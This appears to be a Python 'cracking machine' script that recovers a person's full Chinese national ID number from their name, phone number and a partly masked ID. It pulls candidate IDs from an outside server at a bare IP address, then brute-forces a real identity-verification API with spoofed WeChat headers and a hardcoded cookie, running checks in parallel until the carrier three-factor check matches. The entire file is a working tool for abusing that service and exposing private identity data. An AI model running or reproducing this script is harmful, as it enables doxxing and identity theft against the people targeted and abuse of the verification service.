import requests
import re
import json
import time
import concurrent.futures

print('---冰宇破解机---\n🟢欢迎使用🟢\n🎉🎉🎉本破解机最终归属权由冰宇所有🎉🎉🎉')

# 目标URL(核验接口)
url = 'https://www.jkjdsh.com/api/gzdAPI/verifyIdentity/submitAuthInfo.service'

# 构造请求头部
headers = {
    'Host': 'www.jkjdsh.com',
    'Connection': 'keep-alive',
   'sec-ch-ua-platform': '"Android"',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 13; PHJ110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/130.0.6723.103 Mobile Safari/537.36 XWEB/1300149 MMWEBSDK/20240802 MMWEBID/1179 MicroMessenger/8.0.53.2740(0x2800353F) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64',
    'Accept': 'application/json, text/plain, */*',
    'Content-Type': 'application/json;charset=UTF-8',
   'sec-ch-ua': '"Chromium";v="130", "Android WebView";v="130", "Not?A_Brand";v="99"',
   'sec-ch-ua-mobile': '?1',
    'domainId': '39cadff535664f3484045479f880cf38-1743601669208-domainId',
    'Origin': 'https://www.jkjdsh.com',
    'X-Requested-With': 'com.tencent.mm',
    'Sec-Fetch-Site':'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'https://www.jkjdsh.com/jiading/',
    'Accept-Encoding': 'gzip, deflate, br, zstd',
    'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
    'Cookie': 'https_waf_cookie=48519dd9-d9f0-4dad923b8968dce885d5bf27b0732eedefaf'
}


def extract_id_cards(response_text):
    # 使用正则表达式提取身份证信息,假设身份证信息是18位数字
    pattern = r'\b\d{18}\b'
    id_cards = re.findall(pattern, response_text)
    return id_cards


def generate_id_cards(name, id_prefix_value):
    url = f"http://154.21.201.192/kubu.php?name={name}&idcard={id_prefix_value}"
    try:
        response = requests.get(url)
        response.raise_for_status()  # 检查请求是否成功
        id_cards = extract_id_cards(response.text)
        if id_cards:
            print("\n提取到的身份证信息:")
            for id_card in id_cards:
                print(id_card)
            return id_cards
        else:
            print("未提取到身份证信息。")
            return []
    except requests.exceptions.RequestException as e:
        print(f"请求出错:{e}")
        return []


def verify_id_card(name, phone, id_card):
    payload = {
        "name": name,
        "idCard": id_card,
        "phone": phone,
        "jmId": "d3c3b6cc0f9611f0bd2b0242ac110004"
    }

    # 发送POST请求
    response = requests.post(url, headers=headers, json=payload)

    try:
        response_text = response.text
        if '认证失败,请重新认证!' in response_text:
            print(f"身份证号:{id_card} 运营商三要素不一致⛔️")
            return False
        elif 'aesKey' in response_text:
            print(f"身份证号:{id_card} 运营商三要素一致✅")
            return id_card
        else:
            print(f"身份证号:{id_card} 运营商三要素不一致⛔️")  # 去掉姓名和手机号信息
            return False
    except:
        print(f"请求响应处理出错,身份证号: {id_card}")
        return False


def main():
    # 输入姓名
    print()
    name = input("请输入名字: ")

    # 输入手机号
    phone = input("请输入手机号: ")

    # 输入模糊的身份证号
    id_prefix_value = input("请输入模糊身份证: ")

    id_cards = generate_id_cards(name, id_prefix_value)

    if not id_cards:
        print("没有可用的身份证号码进行核验。")
        return

    success_id_card = None  # 用于存储核验成功的身份证号

    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        future_to_id = {executor.submit(verify_id_card, name, phone, id_card): id_card for id_card in id_cards}
        for future in concurrent.futures.as_completed(future_to_id):
            result = future.result()
            if result:
                success_id_card = result
                break

    if success_id_card:
        print(f"最终核验成功的信息:姓名:{name},手机号:{phone},身份证:{success_id_card}")
    else:
        print("所有尝试的身份证信息均核验不一致")


if __name__ == "__main__":
    main()
